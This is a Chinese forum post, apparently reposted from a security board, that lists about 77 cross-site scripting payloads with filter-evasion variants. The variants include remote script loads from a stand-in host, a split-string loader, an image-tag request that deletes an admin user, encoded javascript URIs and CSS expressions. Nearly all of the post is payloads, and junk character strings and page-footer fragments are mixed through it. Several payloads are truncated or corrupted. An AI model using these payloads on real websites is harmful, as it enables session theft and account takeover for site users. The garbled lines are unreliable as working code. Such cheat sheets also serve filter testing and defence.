貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
* W* b) @3 _; P9 B: K5 ]3 i. X; n(1)普通的XSS JavaScript注入# j3 F" Q5 l* p0 k& M Z
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 r7 b! g7 }7 U$ ]7 g& ^. T(2)IMG标签XSS使用JavaScript命令2 e7 Y; `+ ]: K0 u# _6 ~6 _
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>4 C3 q2 I; {5 F8 u0 X- h6 w
(3)IMG标签无分号无引号
0 J/ p6 [. N8 s2 d' ?$ [# q<IMG SRC=javascript:alert(‘XSS’)>, n& f5 d* A' O/ R8 M1 @
(4)IMG标签大小写不敏感" f9 h* ]/ N0 l2 I4 P1 N+ O
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
: n4 r, G% G/ ] v(5)HTML编码(必须有分号); b0 p! h- x+ L& N1 G+ K
<IMG SRC=javascript:alert(“XSS”)>/ H4 B& W. t! S( N$ t
(6)修正缺陷IMG标签( H) D- G% ?$ w1 W" C
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>$ {2 z% x6 ~6 u# O
0 ]5 D* w" d1 ^/ `" t( c$ G, {
4 X& P% V1 c8 P(7)formCharCode标签(计算器)
' N R- f* L% P. ~" n( B& R<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>8 u7 S: l' T- C
(8)UTF-8的Unicode编码(计算器)$ j5 F$ Q( m: ?0 V* D! u
<IMG SRC=jav..省略..S')>
- F- J J8 L& J8 {* s7 h3 N(9)7位的UTF-8的Unicode编码是没有分号的(计算器)7 b9 \$ c, \7 ~
<IMG SRC=jav..省略..S')>
" q- j3 l5 h% z8 F(10)十六进制编码也是没有分号(计算器)
+ g8 g& a% g: w9 V7 P<IMG SRC=java..省略..XSS')>
& ^6 G2 L* h0 @" j. d" H(11)嵌入式标签,将Javascript分开
$ u, Y0 @/ P ?' `7 s<IMG SRC=”jav ascript:alert(‘XSS’);”>' ~( h+ R, K7 K
(12)嵌入式编码标签,将Javascript分开$ b& ^# z, H1 t Y* D' g% ~
<IMG SRC=”jav ascript:alert(‘XSS’);”>$ s, m4 m, i' ~. }1 v0 Q0 |
(13)嵌入式换行符
! d$ E. }& A+ W+ W<IMG SRC=”jav ascript:alert(‘XSS’);”>
' R" @- r* m' z* {( a# G& M(14)嵌入式回车' A# z4 J9 B% g7 T7 u7 R
<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 e1 K) J- W5 K" X( n(15)嵌入式多行注入JavaScript,这是XSS极端的例子# F7 z' s' ]& K0 [
<IMG SRC=”javascript:alert(‘XSS‘)”>8 t% O: I' p" o C5 f/ O y) j5 H' f
(16)解决限制字符(要求同页面)( C8 I0 ~, a8 t0 Y: {! ` _
<script>z=’document.’</script>
$ I; p4 K2 b- [6 B8 e0 S<script>z=z+’write(“‘</script>! G4 f; c5 p4 m; P* Y) ]
<script>z=z+’<script’</script>3 g! E) i( n. E4 s
<script>z=z+’ src=ht’</script>5 `9 o$ s/ N& N0 W
<script>z=z+’tp://ww’</script>
; D3 ~5 G# Y1 O$ R0 k5 }<script>z=z+’w.shell’</script>
3 _2 r: q) }9 d<script>z=z+’.net/1.’</script>+ r0 G2 j7 q$ b+ b8 T
<script>z=z+’js></sc’</script>
3 J1 u7 |, g6 G% s! K# b1 x<script>z=z+’ript>”)’</script>+ E$ x- ]6 v5 i9 `4 G
<script>eval_r(z)</script>
& [) _8 O1 }0 m7 z. b(17)空字符12-7-1 T00LS - Powered by Discuz! Board7 c Y6 V, R( J2 Y6 f. F% q
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
2 l) h" L; G- q/ jperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
$ {5 S$ f. y0 A! ^7 O9 R( u# ](18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
: a$ |0 n: k5 U8 {perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out' i. |3 N* l; j
(19)Spaces和meta前的IMG标签; W8 O9 v4 h5 W; L) ?
<IMG SRC=” javascript:alert(‘XSS’);”>3 h% W2 t2 H" |2 l3 f8 `; Q
(20)Non-alpha-non-digit XSS
% ]8 L; r9 s' Z" ~<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>; h0 j( K, D, r0 i7 L
(21)Non-alpha-non-digit XSS to 2. \; a$ P0 {# u. P7 ]
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
. W( h* L+ E5 w- y(22)Non-alpha-non-digit XSS to 3) p. Z# ?6 U2 w. ~9 U
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>" U. i1 V4 J2 x4 K1 S8 L4 W
(23)双开括号
. r2 V" G x9 t7 C4 f<<SCRIPT>alert(“XSS”);//<</SCRIPT>
6 ?% }, z& B% ~* J, _/ ?& w(24)无结束脚本标记(仅火狐等浏览器)( M9 z4 C8 A1 n; a
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>) `5 J+ Z/ |/ p2 L L
(25)无结束脚本标记2
* B- G( v- g$ x$ P0 L<SCRIPT SRC=//3w.org/XSS/xss.js>
; S, E3 c% |/ q# G' v8 q2 A) M(26)半开的HTML/JavaScript XSS
4 Y( y* q7 R1 ^( N& G<IMG SRC=”javascript:alert(‘XSS’)”
. e& e3 A& K# d+ \& n(27)双开角括号
5 C1 Y3 k) \( y" i; k P j<iframe src=http://3w.org/XSS.html <; |6 Y. I! a5 g+ E( j1 j: Y
(28)无单引号 双引号 分号
2 ]2 q! b) Y# N. l* y6 p/ h, z+ p<SCRIPT>a=/XSS/
6 i, R- S+ F3 D" Ralert(a.source)</SCRIPT>
2 W/ X/ k/ ~( T$ g6 Q(29)换码过滤的JavaScript
: `) G0 }/ d, b' C' I2 G9 A\”;alert(‘XSS’);//# Y7 z+ ?0 Q& {- c c4 O
(30)结束Title标签' P* C9 t2 q8 E1 S& e' z( o
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>' L- W' c4 W5 A+ @; ]
(31)Input Image
( w" w I$ f6 l$ R<INPUT SRC=”javascript:alert(‘XSS’);”>
6 P- K: E; N" w- b% ^9 H(32)BODY Image
3 T* n. j+ @5 L) `<BODY BACKGROUND=”javascript:alert(‘XSS’)”>" W& D% f8 S7 V4 p0 z
(33)BODY标签
- m4 H3 L& o! D0 H& [; g5 e<BODY(‘XSS’)>* s) c: Z( Q& u$ y: H( b! c" J4 b
(34)IMG Dynsrc
7 n' s) {1 c; \5 f, ]( n<IMG DYNSRC=”javascript:alert(‘XSS’)”>0 h7 B4 X5 O7 k/ g; V# m. f
(35)IMG Lowsrc
- Q+ y! \/ }3 C% ?; r<IMG LOWSRC=”javascript:alert(‘XSS’)”>
5 O7 F7 q0 C+ W H0 A: R(36)BGSOUND
3 K+ A4 K/ B3 i4 B2 K<BGSOUND SRC=”javascript:alert(‘XSS’);”>
$ p. `7 T/ U; ~, x(37)STYLE sheet
) o) C0 T3 c2 d/ `0 h4 b<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
$ J# Q! [! C( ?+ L/ E7 Z7 j5 `(38)远程样式表: P+ k1 X5 e N* [
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>3 y; L. m# s) G: M
(39)List-style-image(列表式)
4 Q# Z: d* z% x6 Q; R' p" t<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
0 ]3 \6 t" H) e% j% d(40)IMG VBscript
/ I' k; s; d$ y- L" }. a! ~<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS% o6 s: d5 A2 j
(41)META链接url( s% r2 `) H- c+ l( s8 N
( Z- A' ]2 i' I! N3 \* U- d% \4 a+ y$ _
<META HTTP-EQUIV=”refresh” CONTENT=”0;- k" D: Q' O3 K5 F6 R
URL=http://;URL=javascript:alert(‘XSS’);”>1 ~! E0 z5 D) v* M6 X5 [
(42)Iframe
2 b/ G; d# o" K s<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
! R8 f) f7 ~/ s2 |& C(43)Frame" M8 P7 A! d6 v, M, G- G8 X. F
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
7 j: q4 }2 c3 V* rhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
! e! U: }: w- G( R v(44)Table
# v% F% @, N( u3 V<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
# `" }; m2 l! r% J0 F(45)TD
) z; q8 h# p4 I<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
/ V5 E& G2 k2 k) @(46)DIV background-image% z# @9 e5 w8 t7 _1 p
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>& y: O2 U# P; o8 q V
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-3 }" x0 H- y& H+ u C
8&13&12288&65279)2 n0 ?5 G! X. N/ K. \
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>, z0 |; s6 z y2 g0 S
(48)DIV expression
0 j- N0 Y: F, t# R<DIV STYLE=”width: expression_r(alert(‘XSS’));”>, |% w# r$ E. B- y4 V( L& F; K
(49)STYLE属性分拆表达
' m' J7 p9 K! [2 G0 _: C6 j9 g. P<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
" B8 H2 F; ?7 V1 U" [(50)匿名STYLE(组成:开角号和一个字母开头)
4 n$ J2 x: U! r. }' @<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
% N( V l; b5 |/ }9 j9 C(51)STYLE background-image$ p' m3 s' u) F
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
1 O: @6 J" z5 {CLASS=XSS></A># V* R4 S8 G7 ^, \* }7 N
(52)IMG STYLE方式
/ }; n! k8 y5 texppression(alert(“XSS”))’>
' f- `+ }4 o7 x% r& ~(53)STYLE background
q! `2 q- ?2 K% k<STYLE><STYLE: H5 t; |+ E- \! p6 m; s( x
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
0 _) w" a' j, i- U( w1 ~( J( \(54)BASE
4 h0 c3 v& u4 F<BASE HREF=”javascript:alert(‘XSS’);//”>3 h$ W0 ?& Z. d
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
7 h7 t6 y" W) ?/ ?0 X<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
9 u" s+ `0 [4 M6 r7 D(56)在flash中使用ActionScrpt可以混进你XSS的代码
( C L, }3 l6 w6 |a=”get”;2 F7 F7 H( ~/ S5 q8 n
b=”URL(\”";
, ?( k: ]) [3 P# r- A+ pc=”javascript:”;
7 m7 ~% Z7 ]4 D2 I# Ad=”alert(‘XSS’);\”)”;
- ~$ ~' O* P6 Y8 L+ a8 ?eval_r(a+b+c+d);! |' {! Y% y+ ?- |# c* J
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
+ O7 |+ j) q5 o3 I( ]; b% V<HTML xmlns:xss># h( c1 t% U, u
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>* x# s2 o) s' X0 s; p
<xss:xss>XSS</xss:xss>$ ?% A8 W! a" I( v% W% f) K
</HTML>
4 G: ~8 Z5 ^+ k2 L7 z2 D9 |: p(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
4 y" P" F3 L) _2 u' }<SCRIPT SRC=””></SCRIPT>4 `2 \& i9 b% {5 X
(59)IMG嵌入式命令,可执行任意命令
. |0 t0 M! M( a; j<IMG SRC=”http://www.XXX.com/a.php?a=b”>3 \( v' N/ q" c: Y- f; N9 T
(60)IMG嵌入式命令(a.jpg在同服务器)6 [, c9 _& L0 ^1 T9 i8 X2 r6 ?
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
2 ~# X5 t# U9 s8 }; d, S2 ~(61)绕符号过滤8 E, {1 l/ g2 P, r* i% ?
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
! N4 q7 W1 y! U4 m(62)% C2 C: |4 r2 M# r1 ^; {
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 D. p' R! ~ n: B(63). @4 E9 J3 L3 s- v. o) R) a
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
4 o* D5 ]6 Q+ q3 W' m6 y(64); H4 c" U/ F2 z+ X9 d
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
# N; q- k% K( G/ k3 S3 }1 X0 v(65)7 `! b; o6 p0 B! ^5 g8 @6 L# q
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>. R9 a( j; N B1 M i
(66)12-7-1 T00LS - Powered by Discuz! Board
! U7 O9 q3 M/ d; W. m/ `, zhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
# ] n) t+ Z- `; M5 E4 k! N1 z<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>: y+ C/ r4 a2 K
(67)% s, h$ Z& h5 p5 t2 }: Z2 y; _( E
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
- J4 M) A" ^8 N6 O</SCRIPT>5 n! o" q; c9 \( V) t: @; G
(68)URL绕行$ y2 Y* i8 J: t( N1 {3 Y
<A HREF=”http://127.0.0.1/”>XSS</A>
8 h7 W3 B8 G0 D9 n R5 y/ Y(69)URL编码
+ {" G) k! `" A<A HREF=”http://3w.org”>XSS</A>% C/ @ E2 M, D
(70)IP十进制
7 l3 Y( k+ ~1 u ]<A HREF=”http://3232235521″>XSS</A>
! J7 K! J6 u6 r$ p: U0 X5 U, d(71)IP十六进制+ H( V$ D3 A$ q9 b: f& u
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
% w z" q$ H3 A- r& m. H* u5 K(72)IP八进制
. Z/ G! H1 b& v7 t<A HREF=”http://0300.0250.0000.0001″>XSS</A>
( p' L+ @: r, G: O% L$ V(73)混合编码
; a6 U0 c) S; F; }<A HREF=”h( |+ Y7 k1 L: y5 `
tt p://6 6.000146.0×7.147/”">XSS</A>+ I" i0 g& k# b& A n
(74)节省[http:]
0 {8 R- N* N3 E3 A+ T, x( C" V<A HREF=”//www.google.com/”>XSS</A>
/ t9 ^( \0 ] s( I+ {# D! e# W(75)节省[www]# B& ^: b4 j; G1 k5 b
<A HREF=”http://google.com/”>XSS</A>
+ ?4 x% |1 f7 ?(76)绝对点绝对DNS# F- M& |: Y$ j) Q
<A HREF=”http://www.google.com./”>XSS</A>
& N$ v7 d: d. G" y6 U& d(77)javascript链接- ^9 f9 _: s/ x7 [
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>+ ?& O9 Q. ]; T8 R8 G/ F
% z6 \3 E& j( E5 ?原文地址:http://fuzzexp.org/u/0day/?p=14
. O6 J" q5 T4 U/ L! q- {; ^: W ?, t/ t
|